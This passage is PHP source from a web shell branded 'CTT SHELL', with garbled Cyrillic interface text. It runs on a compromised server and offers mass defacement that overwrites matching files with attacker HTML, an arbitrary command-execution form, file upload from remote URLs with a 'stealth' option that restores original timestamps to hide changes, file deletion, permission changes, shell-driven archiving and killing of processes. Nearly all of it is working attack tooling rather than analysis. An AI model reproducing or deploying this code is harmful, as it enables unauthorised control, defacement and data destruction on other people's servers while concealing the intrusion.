  1188. $v = join("&nbsp;&nbsp;&nbsp;",$v);
  1189. echo "<b>Ñàìîóäàëèòü: ".__FILE__." <br>Âû óâåðåííû?</b><center>".$v."</center>";
  1190. }
  1191. }
  1192. if ($act == "massdeface")
  1193. {
  1194. if (empty($deface_in)) {$deface_in = $d;}
  1195. if (empty($deface_name)) {$deface_name = "(.*)"; $deface_name_regexp = 1;}
  1196. if (empty($deface_text_wwo)) {$deface_text_regexp = 0;}
  1197. if (!empty($submit))
  1198. {
  1199. $found = array();
  1200. $found_d = 0;
  1201. $found_f = 0;
  1202. $text = $deface_text;
  1203. $text_regexp = $deface_text_regexp;
  1204. if (empty($text)) {$text = " "; $text_regexp = 1;}
  1205. $a = array
  1206. (
  1207. "name"=>$deface_name, "name_regexp"=>$deface_name_regexp,
  1208. "text"=>$text, "text_regexp"=>$text_regxp,
  1209. "text_wwo"=>$deface_text_wwo,
  1210. "text_cs"=>$deface_text_cs,
  1211. "text_not"=>$deface_text_not
  1212. );
  1213. $defacetime = getmicrotime();
  1214. $in = array_unique(explode(";",$deface_in));
  1215. foreach($in as $v) {ctfsearch($v);}
  1216. $defacetime = round(getmicrotime()-$defacetime,4);
  1217. if (count($found) == 0) {echo "<b>No files found!</b>";}
  1218. else
  1219. {
  1220. $ls_arr = $found;
  1221. $disp_fullpath = true;
  1222. $act = $dspact = "ls";
  1223. }
  1224. }
  1225. else
  1226. {
  1227. if (empty($deface_preview)) {$deface_preview = 1;}
  1228. }
  1229. echo "<form method=\"POST\">";
  1230. if (!$submit) {echo "<big><b>Attention! It's a very dangerous feature, you may lost your data.</b></big><br><br>";}
  1231. echo "<input type=\"hidden\" name=\"d\" value=\"".$dispd."\">
  1232. <b>Deface for (file/directory name): </b><input type=\"text\" name=\"deface_name\" size=\"".round(strlen($deface_name)+25)."\" value=\"".htmlspecialchars($deface_name)."\">&nbsp;<input type=\"checkbox\" name=\"deface_name_regexp\" value=\"1\" ".gchds($deface_name_regexp,1," checked")."> - regexp
  1233. <br><b>Deface in (explode \";\"): </b><input type=\"text\" name=\"deface_in\" size=\"".round(strlen($deface_in)+25)."\" value=\"".htmlspecialchars($deface_in)."\">
  1234. <br><br><b>Search text:</b><br><textarea name=\"deface_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_text)."</textarea>
  1235. <br><br><input type=\"checkbox\" name=\"deface_text_regexp\" value=\"1\" ".gchds($deface_text_regexp,1," checked")."> - regexp
  1236. &nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_wwo\" value=\"1\" ".gchds($deface_text_wwo,1," checked")."> - <u>w</u>hole words only
  1237. &nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_cs\" value=\"1\" ".gchds($deface_text_cs,1," checked")."> - cas<u>e</u> sensitive
  1238. &nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_not\" value=\"1\" ".gchds($deface_text_not,1," checked")."> - find files <u>NOT</u> containing the text
  1239. <br><input type=\"checkbox\" name=\"deface_preview\" value=\"1\" ".gchds($deface_preview,1," checked")."> - <b>PREVIEW AFFECTED FILES</b>
  1240. <br><br><b>Html of deface:</b><br><textarea name=\"deface_html\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_html)."</textarea>
  1241. <br><br><input type=\"submit\" name=\"submit\" value=\"Deface\"></form>";
  1242. if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Deface took ".$defacetime." secs</b><br><br>";}
  1243. }
  1244. if ($act == "search")
  1245. {
  1246. if (empty($search_in)) {$search_in = $d;}
  1247. if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
  1248. if (empty($search_text_wwo)) {$search_text_regexp = 0;}
  1249. if (!empty($submit))
  1250. {
  1251. $found = array();
  1252. $found_d = 0;
  1253. $found_f = 0;
  1254. $a = array
  1255. (
  1256. "name"=>$search_name, "name_regexp"=>$search_name_regexp,
  1257. "text"=>$search_text, "text_regexp"=>$search_text_regxp,
  1258. "text_wwo"=>$search_text_wwo,
  1259. "text_cs"=>$search_text_cs,
  1260. "text_not"=>$search_text_not
  1261. );
  1262. $searchtime = getmicrotime();
  1263. $in = array_unique(explode(";",$search_in));
  1264. foreach($in as $v)
  1265. {
  1266. ctfsearch($v);
  1267. }
  1268. $searchtime = round(getmicrotime()-$searchtime,4);
  1269. if (count($found) == 0) {echo "<b>No files found!</b>";}
  1270. else
  1271. {
  1272. $ls_arr = $found;
  1273. $disp_fullpath = true;
  1274. $act = $dspact = "ls";
  1275. }
  1276. }
  1277. echo "<form method=\"POST\">
  1278. <input type=\"hidden\" name=\"d\" value=\"".$dispd."\">
  1279. <b>Search for (file/directory name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".gchds($search_name_regexp,1," checked")."> - regexp
  1280. <br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
  1281. <br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
  1282. <br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".gchds($search_text_regexp,1," checked")."> - regexp
  1283. &nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".gchds($search_text_wwo,1," checked")."> - <u>w</u>hole words only
  1284. &nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".gchds($search_text_cs,1," checked")."> - cas<u>e</u> sensitive
  1285. &nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".gchds($search_text_not,1," checked")."> - find files <u>NOT</u> containing the text
  1286. <br><br><input type=\"submit\" name=\"submit\" value=\"Search\"></form>";
  1287. if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs</b><br><br>";}
  1288. }
  1289. if ($act == "chmod")
  1290. {
  1291. $perms = fileperms($d.$f);
  1292. if (!$perms) {echo "Can't get current mode.";}
  1293. elseif ($submit)
  1294. {
  1295. if (!isset($owner[0])) {$owner[0] = 0;}
  1296. if (!isset($owner[1])) {$owner[1] = 0; }
  1297. if (!isset($owner[2])) {$owner[2] = 0;}
  1298. if (!isset($group[0])) {$group[0] = 0;}
  1299. if (!isset($group[1])) {$group[1] = 0;}
  1300. if (!isset($group[2])) {$group[2] = 0;}
  1301. if (!isset($world[0])) {$world[0] = 0;}
  1302. if (!isset($world[1])) {$world[1] = 0;}
  1303. if (!isset($world[2])) {$world[2] = 0;}
  1304. $sum_owner = $owner[0] + $owner[1] + $owner[2];
  1305. $sum_group = $group[0] + $group[1] + $group[2];
  1306. $sum_world = $world[0] + $world[1] + $world[2];
  1307. $sum_chmod = "0".$sum_owner.$sum_group.$sum_world;
  1308. $ret = @chmod($d.$f, $sum_chmod);
  1309. if ($ret) {$act = "ls";}
  1310. else {echo "<b>Èçìåíåíèå Àòðèáóò Ôàéëà (".$d.$f.")</b>: Îøèáêà<br>";}
  1311. }
  1312. else
  1313. {
  1314. echo "<center><b>Èçìåíåíèå Àòðèáóò Ôàéëà</b><br>";
  1315. $perms = view_perms(fileperms($d.$f));
  1316. $length = strlen($perms);
  1317. $owner_r = $owner_w = $owner_x =
  1318. $group_r = $group_w = $group_x =
  1319. $world_r = $world_w = $group_x = "";
  1320. if ($perms[1] == "r") {$owner_r = " checked";} if ($perms[2] == "w") {$owner_w = " checked";}
  1321. if ($perms[3] == "x") {$owner_x = " checked";} if ($perms[4] == "r") {$group_r = " checked";}
  1322. if ($perms[5] == "w") {$group_w = " checked";} if ($perms[6] == "x") {$group_x = " checked";}
  1323. if ($perms[7] == "r") {$world_r = " checked";} if ($perms[8] == "w") {$world_w = " checked";}
  1324. if ($perms[9] == "x") {$world_x = " checked";}
  1325. echo "<form method=\"POST\"><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value='".htmlspecialchars($f)."'>
  1326. <input type=hidden name=act value=chmod><input type=hidden name=submit value=1><input type=hidden name='owner[3]' value=no_error>
  1327. <input type=hidden name='group[3]' value=no_error><input type=hidden name='world[3]' value=no_error>
  1328. <table class=table1><tr><td class=td2><table class=table1 align=center width=300 border=0 cellspacing=0 cellpadding=5><tr><td class=td2><b>Owner</b><br><br>
  1329. <input type=checkbox NAME=owner[0] value=4".$owner_r.">Read<br><input type=checkbox NAME=owner[1] value=2".$owner_w.">Write<br>
  1330. <input type=checkbox NAME=owner[2] value=1".$owner_x.">Execute</font></td><td class=td2><b>Group</b><br><br>
  1331. <input type=checkbox NAME=group[0] value=4".$group_r.">Read<br>
  1332. <input type=checkbox NAME=group[1] value=2".$group_w.">Write<br>
  1333. <input type=checkbox NAME=group[2] value=1".$group_x.">Execute</font></td>
  1334. <td class=td2><b>World</b><br><br><input type=checkbox NAME=world[0] value=4".$world_r.">Read<br>
  1335. <input type=checkbox NAME=world[1] value=2".$world_w.">Write<br>
  1336. <input type=checkbox NAME=world[2] value=1".$world_x.">Execute</font></td>
  1337. </tr></table></td></tr><tr align=center><td><input type=submit name=chmod value=\"Ñîõðàíèòü\"></td></tr></table></FORM></center>";
  1338. }
  1339. }
  1340. if ($act == "upload")
  1341. {
  1342. $uploadmess = "";
  1343. $uploadpath = str_replace("\\","/",$uploadpath);
  1344. if (empty($uploadpath)) {$uploadpath = $d;}
  1345. elseif (substr($uploadpath,strlen($uploadpath)-1,1) != "/") {$uploadpath .= "/";}
  1346. if (!empty($submit))
  1347. {
  1348. global $HTTP_POST_FILES;
  1349. $uploadfile = $HTTP_POST_FILES["uploadfile"];
  1350. if (!empty($uploadfile[tmp_name]))
  1351. {
  1352. if (empty($uploadfilename)) {$destin = $uploadfile[name];}
  1353. else {$destin = $userfilename;}
  1354. if (!move_uploaded_file($uploadfile[tmp_name],$uploadpath.$destin)) {$uploadmess .= "Îøèáêà, çàãðóæàþùàÿ ôàéë ".$uploadfile[name]." (íå ìîæåò ñêîïèðîâàòü \"".$uploadfile[tmp_name]."\" íà \"".$uploadpath.$destin."\"!<br>";}
  1355. }
  1356. elseif (!empty($uploadurl))
  1357. {
  1358. if (!empty($uploadfilename)) {$destin = $uploadfilename;}
  1359. else
  1360. {
  1361. $destin = explode("/",$destin);
  1362. $destin = $destin[count($destin)-1];
  1363. if (empty($destin))
  1364. {
  1365. $i = 0;
  1366. $b = "";
  1367. while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
  1368. }
  1369. if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
  1370. else
  1371. {
  1372. $st = getmicrotime();
  1373. $content = @file_get_contents($uploadurl);
  1374. $dt = round(getmicrotime()-$st,4);
  1375. if (!$content) {$uploadmess .= "Íå ìîæåò çàãðóçèòü ôàéë!<br>";}
  1376. else
  1377. {
  1378. if ($filestealth) {$stat = stat($uploadpath.$destin);}
  1379. $fp = fopen($uploadpath.$destin,"w");
  1380. if (!$fp) {$uploadmess .= "Îøèáêà, ïèøóùàÿ ôàéëó ".htmlspecialchars($destin)."!<br>";}
  1381. else
  1382. {
  1383. fwrite($fp,$content,strlen($content));
  1384. fclose($fp);
  1385. if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
  1386. }
  1387. }
  1388. }
  1389. }
  1390. }
  1391. if ($miniform)
  1392. {
  1393. echo "<b>".$uploadmess."</b>";
  1394. $act = "ls";
  1395. }
  1396. else
  1397. {
  1398. echo "<b>Çàãðóçêà Ôàéëà:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$sul."act=upload&d=".urlencode($d)."\" method=\"POST\">
  1399. Ëîêàëüíûé ôàéë: <br><input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;èëè<br>
  1400. Çàãðóçèòü èç URL: <br><input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
  1401. Ñîõðàíèòü ýòîò ôàéëü â ïàïêó: <br><input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
  1402. Èìÿ Ôàéëà: <br><input name=uploadfilename size=25>
  1403. <input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;Êîíâåðòèðîâàòü èìÿ ôàéëà<br><br>
  1404. <input type=\"submit\" name=\"submit\" value=\"Çàãðóçèòü\">
  1405. </form>";
  1406. }
  1407. }
  1408. if ($act == "delete")
  1409. {
  1410. $delerr = "";
  1411. foreach ($actbox as $v)
  1412. {
  1413. $result = false;
  1414. $result = fs_rmobj($v);
  1415. if (!$result) {$delerr .= "Íå ìîæåò óäàëèòü ".htmlspecialchars($v)."<br>";}
  1416. if (!empty($delerr)) {echo "<b>Óäàëåíèå ñ îøèáêàìè:</b><br>".$delerr;}
  1417. }
  1418. $act = "ls";
  1419. }
  1420. if ($act == "onedelete")
  1421. {
  1422. $delerr = "";
  1423. $result = false;
  1424. $result = fs_rmobj($f);
  1425. if (!$result) {$delerr .= "Íå ìîæåò óäàëèòü ".htmlspecialchars($f)."<br>";}
  1426. if (!empty($delerr)) {echo "<b>Óäàëåíèå ñ îøèáêàìè:</b><br>".$delerr;}
  1427. $act = "ls";
  1428. }
  1429. if ($act == "onedeleted")
  1430. {
  1431. $delerr = "";
  1432. $result = false;
  1433. $result = fs_rmobj($d+'/'+$f);
  1434. if (!$result) {$delerr .= "Íå ìîæåò óäàëèòü ".htmlspecialchars($f)."<br>";}
  1435. if (!empty($delerr)) {echo "<b>Óäàëåíèå ñ îøèáêàìè:</b><br>".$delerr;}
  1436. $act = "ls";
  1437. }
  1438. if ($act == "deface")
  1439. {
  1440. $deferr = "";
  1441. foreach ($actbox as $v)
  1442. {
  1443. $data = $deface_html;
  1444. if (eregi("%%%filedata%%%",$data)) {$data = str_replace("%%%filedata%%%",file_get_contents($v),$data);}
  1445. $data = str_replace("%%%filename%%%",basename($v),$data);
  1446. $data = str_replace("%%%filepath%%%",$v,$data);
  1447. $fp = @fopen($v,"w");
  1448. fwrite($fp,$data);
  1449. fclose($fp);
  1450. if (!$result) {$deferr .= "Can't deface ".htmlspecialchars($v)."<br>";}
  1451. if (!empty($delerr)) {echo "<b>Defacing with errors:</b><br>".$deferr;}
  1452. }
  1453. }
  1454. if (!$usefsbuff)
  1455. {
  1456. if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"USEFSBUFF\" as TRUE.</center>";}
  1457. }
  1458. else
  1459. {
  1460. if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); ct_sess_put($sess_data); $act = "ls";}
  1461. if ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); ct_sess_put($sess_data); $act = "ls";}
  1462. if ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} $ls_arr = array_merge($sess_data["copy"],$sess_data["cut"]); ct_sess_put($sess_data); $act = "ls";}
  1463. if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); ct_sess_put($sess_data);}
  1464. elseif ($actpastebuff)
  1465. {
  1466. $psterr = "";
  1467. foreach($sess_data["copy"] as $k=>$v)
  1468. {
  1469. $to = $d.basename($v);
  1470. if (!fs_copy_obj($v,$d)) {$psterr .= "Íå ìîæåò ñêîïèðîâàòü ".$v." to ".$to."!<br>";}
  1471. if ($copy_unset) {unset($sess_data["copy"][$k]);}
  1472. }
  1473. foreach($sess_data["cut"] as $k=>$v)
  1474. {
  1475. $to = $d.basename($v);
  1476. if (!fs_move_obj($v,$d)) {$psterr .= "Íå ìîæåò ïåðåìåñòèòüñÿ ".$v." to ".$to."!<br>";}
  1477. unset($sess_data["cut"][$k]);
  1478. }
  1479. ct_sess_put($sess_data);
  1480. if (!empty($psterr)) {echo "<b>Ïðèêëåèâàíèå ñ îøèáêàìè:</b><br>".$psterr;}
  1481. $act = "ls";
  1482. }
  1483. elseif ($actarcbuff)
  1484. {
  1485. $arcerr = "";
  1486. if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
  1487. else {$ext = ".tar.gz";}
  1488. if ($ext == ".tar.gz")
  1489. {
  1490. $cmdline = "tar cfzv";
  1491. }
  1492. $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
  1493. foreach($objects as $v)
  1494. {
  1495. $v = str_replace("\\","/",$v);
  1496. if (is_dir($v))
  1497. {
  1498. if (substr($v,strlen($v)-1,strlen($v)) != "/") {$v .= "/";}
  1499. $v .= "*";
  1500. }
  1501. $cmdline .= " ".$v;
  1502. }
  1503. $ret = `$cmdline`;
  1504. if (empty($ret)) {$arcerr .= "Íå ìîæåò íàçâàòü archivator!<br>";}
  1505. $ret = str_replace("\r\n","\n");
  1506. $ret = explode("\n",$ret);
  1507. if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
  1508. foreach($sess_data["cut"] as $k=>$v)
  1509. {
  1510. if (in_array($v,$ret)) {fs_rmobj($v);}
  1511. unset($sess_data["cut"][$k]);
  1512. }
  1513. ct_sess_put($sess_data);
  1514. if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
  1515. $act = "ls";
  1516. }
  1517. elseif ($actpastebuff)
  1518. {
  1519. $psterr = "";
  1520. foreach($sess_data["copy"] as $k=>$v)
  1521. {
  1522. $to = $d.basename($v);
  1523. if (!fs_copy_obj($v,$d)) {$psterr .= "Íå ìîæåò ñêîïèðîâàòü ".$v." to ".$to."!<br>";}
  1524. if ($copy_unset) {unset($sess_data["copy"][$k]);}
  1525. }
  1526. foreach($sess_data["cut"] as $k=>$v)
  1527. {
  1528. $to = $d.basename($v);
  1529. if (!fs_move_obj($v,$d)) {$psterr .= "Íå ìîæåò ïåðåìåñòèòüñÿ ".$v." to ".$to."!<br>";}
  1530. unset($sess_data["cut"][$k]);
  1531. }
  1532. ct_sess_put($sess_data);
  1533. if (!empty($psterr)) {echo "<b>Ïðèêëåèâàíèå ñ îøèáêàìè:</b><br>".$psterr;}
  1534. $act = "ls";
  1535. }
  1536. }
  1537. if ($act == "ls")
  1538. {
  1539. if (count($ls_arr) > 0) {$list = $ls_arr;}
  1540. else
  1541. {
  1542. $list = array();
  1543. if ($h = @opendir($d))
  1544. {
  1545. while ($o = readdir($h)) {$list[] = $d.$o;}
  1546. closedir($h);
  1547. }
  1548. }
  1549. if (count($list) == 0) {echo "<center><b>Íå ìîæåò îòêðûòü ñïðàâî÷íèê (".htmlspecialchars($d).")!</b></center>";}
  1550. else
  1551. {
  1552. $tab = array();
  1553. $amount = count($ld)+count($lf);
  1554. $vd = "f";
  1555. if ($vd == "f")
  1556. {
  1557. $row = array();
  1558. $row[] = "<b><center>Èìÿ</b>";
  1559. $row[] = "<b><center>Ðàçìåð</center></b>";
  1560. $row[] = "<b><center>Èçìåíåí</center></b>";
  1561. if (!$win)
  1562. {$row[] = "<b><center>Âëàäåëåö/Ãðóïïà</center></b>";}
  1563. $row[] = "<b><center>Ïðàâà</center></b>";
  1564. $row[] = "<b><center>Ôóíêöèè</center></b>";
  1565. $k = $sort[0];
  1566. if ((!is_numeric($k)) or ($k > count($row)-2)) {$k = 0;}
  1567. if (empty($sort[1])) {$sort[1] = "d";}
  1568. if ($sort[1] != "a")
  1569. {
  1570. $y = "<a href=\"".$sul."act=".$dspact."&d=".urlencode($d)."&sort=".$k."a\"><img src=\"".$sul."act=img&img=sort_desc\" border=\"0\"></a></center>";
  1571. }
  1572. else
  1573. {
  1574. $y = "<a href=\"".$sul."act=".$dspact."&d=".urlencode($d)."&sort=".$k."d\"><img src=\"".$sul."act=img&img=sort_asc\" border=\"0\"></a></center>";
  1575. }
  1576. $row[$k] .= $y;
  1577. for($i=0;$i<count($row)-1;$i++)
  1578. {
  1579. if ($i != $k) {$row[$i] = "<a href=\"".$sul."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$sort[1]."\">".$row[$i]."</a>";}
  1580. }
  1581. $tab = array();
  1582. $tab[cols] = array($row);
  1583. $tab[head] = array();
  1584. $tab[dirs] = array();
  1585. $tab[links] = array();
  1586. $tab[files] = array();
  1587. foreach ($list as $v)
  1588. {
  1589. $o = basename($v);
  1590. $dir = dirname($v);
  1591. if ($disp_fullpath) {$disppath = $v;}
  1592. else {$disppath = $o;}
  1593. $disppath = str2mini($disppath,60);
  1594. if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
  1595. elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
  1596. $uo = urlencode($o);
  1597. $ud = urlencode($dir);
  1598. $uv = urlencode($v);
  1599. $row = array();
  1600. if (is_dir($v))
  1601. {
  1602. if (is_link($v)) {$disppath .= " => ".readlink($v); $type = "LINK";}
  1603. else {$type = "DIR";}
  1604. $row[] = "<a href=\"".$sul."act=ls&d=".$uv."&sort=".$sort."\"> <img src=\"".$sul."act=img&img=small_dir\" height=\"16\" width=\"16\" border=\"0\">&nbsp; ".$disppath."</a>";
  1605. $row[] = $type;
  1606. }
  1607. elseif(is_file($v))
  1608. {
  1609. $ext = explode(".",$o);
  1610. $c = count($ext)-1;
  1611. $ext = $ext[$c];
  1612. $ext = strtolower($ext);
  1613. $row[] = "<a href=\"".$sul."act=f&f=".$uo."&d=".$ud."&\"><img src=\"".$sul."act=img&img=ext_".$ext."\" height=\"16\" width=\"16\" border=\"0\">&nbsp; ".$disppath."</a>";
  1614. $row[] = view_size(filesize($v));
  1615. }
  1616. $row[] = "<center>".date("d.m.Y H:i:s",filemtime($v))."</center>";
  1617. if (!$win)
  1618. {
  1619. $ow = @posix_getpwuid(fileowner($v));
  1620. $gr = @posix_getgrgid(filegroup($v));
  1621. $row[] = "<center>".$ow["name"]."/".$gr["name"]."</center>";
  1622. }
  1623. if (is_writable($v)) {$row[] = "<a href=\"".$sul."act=chmod&f=".$uo."&d=".$ud."\">".view_perms(fileperms($v))."</a>";}
  1624. else {$row[] = "<a href=\"".$sul."act=chmod&f=".$uo."&d=".$ud."\"><font color=\"red\">".view_perms(fileperms($v))."</font></a>";}
  1625. if (is_dir($v)) {$row[] = "&nbsp;<input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">&nbsp;<a href=\"".$sul."act=onedeleted&f=".$uo."&d=".$ud."\"><img src=\"".$sul."act=img&img=odel\" title=\"Delete\" height=\"16\" width=\"19\" border=\"0\"></a>";}
  1626. else {$row[] = "&nbsp;<input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">&nbsp;<a href=\"".$sul."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$sul."act=img&img=change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$sul."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$sul."act=img&img=download\" title=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$sul."act=onedelete&f=".$uo."&d=".$ud."\"><img src=\"".$sul."act=img&img=odel\" title=\"Delete\" height=\"16\" width=\"19\" border=\"0\"></a>";}
  1627. if (($o == ".") or ($o == "..")) {$tab[head][] = $row;}
  1628. elseif (is_link($v)) {$tab[links][] = $row;}
  1629. elseif (is_dir($v)) {$tab[dirs][] = $row;}
  1630. elseif (is_file($v)) {$tab[files][] = $row;}
  1631. }
  1632. }
  1633. $v = $sort[0];
  1634. function tabsort($a, $b)
  1635. {
  1636. global $v;
  1637. return strnatcasecmp(strip_tags($a[$v]), strip_tags($b[$v]));
  1638. }
  1639. usort($tab[dirs], "tabsort");
  1640. usort($tab[files], "tabsort");
  1641. if ($sort[1] == "a")
  1642. {
  1643. $tab[dirs] = array_reverse($tab[dirs]);
  1644. $tab[files] = array_reverse($tab[files]);
  1645. }
  1646. $table = array_merge($tab[cols],$tab[head],$tab[dirs],$tab[links],$tab[files]);
  1647. echo "<TABLE class=table1 cellSpacing=0 cellPadding=0 width=100% border=0>
  1648. <form method=\"POST\">";
  1649. $smsn=0;
  1650. foreach($table as $row)
  1651. {
  1652. $smsn++;
  1653. if ($smsn!=2 && $smsn!=3) {
  1654. echo "<tr>\r\n";
  1655. foreach($row as $v) {echo "<td class=tds1 bgcolor=#242424>".$v."</td>\r\n";}
  1656. echo "</tr>\r\n";
  1657. }
  1658. }
  1659. echo "</table><TABLE height=1% class=table2 cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#333333 border=0>
  1660. <tr class=tr2>
  1661. <td width=8% height=1%><font size=2 color=#000000>
  1662. Ïàïêè: ".(count($tab[dirs])+count($tab[links]))."</font></td>
  1663. <td width=8% height=1%><font size=2 color=#000000> Ôàéëû: ".count($tab[files])."</font></td><td height=1% vAlign=top align=right>";
  1664. if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
  1665. {
  1666. echo "<input type=\"submit\" name=\"actarcbuff\" value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actpastebuff\" value=\"Âñòàâèòü\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actemptybuff\" value=\"Ïóñòîé áóôåð\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
  1667. }
  1668. echo "<select name=\"act\"><option value=\"".$act."\">Ñ îòîáðàííûì:</option>";
  1669. echo "<option value=\"delete\"".gchds($dspact,"delete"," selected").">Óäàëèòü</option>";
  1670. if ($usefsbuff)
  1671. {
  1672. echo "<option value=\"cut\"".gchds($dspact,"cut"," selected").">Âûðàçàòü</option>";
  1673. echo "<option value=\"copy\"".gchds($dspact,"copy"," selected").">Êîïèðîâàòü</option>";
  1674. echo "<option value=\"unselect\"".gchds($dspact,"unselect"," selected").">Íåâûáðàòü</option>";
  1675. }
  1676. if ($dspact == "massdeface") {echo "<option value=\"deface\"".gchds($dspact,"deface"," selected").">Íåâûáðàòü</option>";}
  1677. echo "</select>&nbsp;<input type=\"submit\" value=\"Ïîäòâåðäèòü\">";
  1678. echo "</form>";
  1679. echo "</td></tr></table>";
  1680. echo "</td></tr></table><br><center><font size=2 color=#aaaaaa>[<a href=http://ctt.void.ru>CTT</a>] SHELL ver ".$shver."</font></center>";
  1681. }
  1682. }
  1683. if ($act == "cmd")
  1684. {
  1685. if (!empty($submit))
  1686. {
  1687. echo "<b>Ðåçóëüòàò âûïîëíåíèÿ ýòà êîìàíäà</b>:<br>";
  1688. $tmp = ob_get_contents();
  1689. $olddir = realpath(".");
  1690. @chdir($d);
  1691. if ($tmp)
  1692. {
  1693. ob_clean();
  1694. myshellexec($cmd);
  1695. $ret = ob_get_contents();
  1696. $ret = convert_cyr_string($ret,"d","w");
  1697. ob_clean();
  1698. echo $tmp;
  1699. if ($cmd_txt)
  1700. {
  1701. $rows = count(explode("
  1702. ",$ret))+1;
  1703. if ($rows < 10) {$rows = 10;}
  1704. echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
  1705. }
  1706. else {echo $ret;}
  1707. }
  1708. else
  1709. {
  1710. if ($cmd_txt)
  1711. {
  1712. echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
  1713. myshellexec($cmd);
  1714. echo "</textarea>";
  1715. }
  1716. else {echo $ret;}
  1717. }
  1718. @chdir($olddir);
  1719. }
  1720. else {echo "<b>Êîìàíäà âûïîëíåíèÿ:</b>"; if (empty($cmd_txt)) {$cmd_txt = true;}}
  1721. echo "<form action=\"".$sul."act=cmd\" method=\"POST\"><textarea name=\"cmd\" cols=\"122\" rows=\"10\">".htmlspecialchars($cmd)."</textarea><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" name=\"submit\" value=\"Âûïîëíèòü\"><input type=\"hidden\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
  1722. }
  1723. if ($act == "ps_aux")
  1724. {
  1725. echo "<b>Ïðîöåññû:</b><br>";
  1726. if ($win) {
  1727. echo "<pre>";
  1728. system('tasklist');
  1729. echo "</pre>";
  1730. }
  1731. else
  1732. {
  1733. if ($pid)
  1734. {
  1735. if (!$sig) {$sig = 9;}
  1736. echo "Sending signal ".$sig." to #".$pid."... ";
  1737. $ret = posix_kill($pid,$sig);
  1738. if ($ret) {echo "ok. he is dead, amen.";}
  1739. else {echo "ERROR. Can't send signal ".htmlspecialchars($sig).", to process #".htmlspecialchars($pid).".";}
  1740. }
  1741. $ret = `ps -aux`;
  1742. if (!$ret) {echo "Can't execute \"ps -aux\"!";}
  1743. else
  1744. {
  1745. $ret = htmlspecialchars($ret);
  1746. $ret = str_replace(""," ",$ret);
  1747. while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);}
  1748. $prcs = explode("\n",$ret);
  1749. $head = explode(" ",$prcs[0]);
  1750. $head[] = "ACTION";
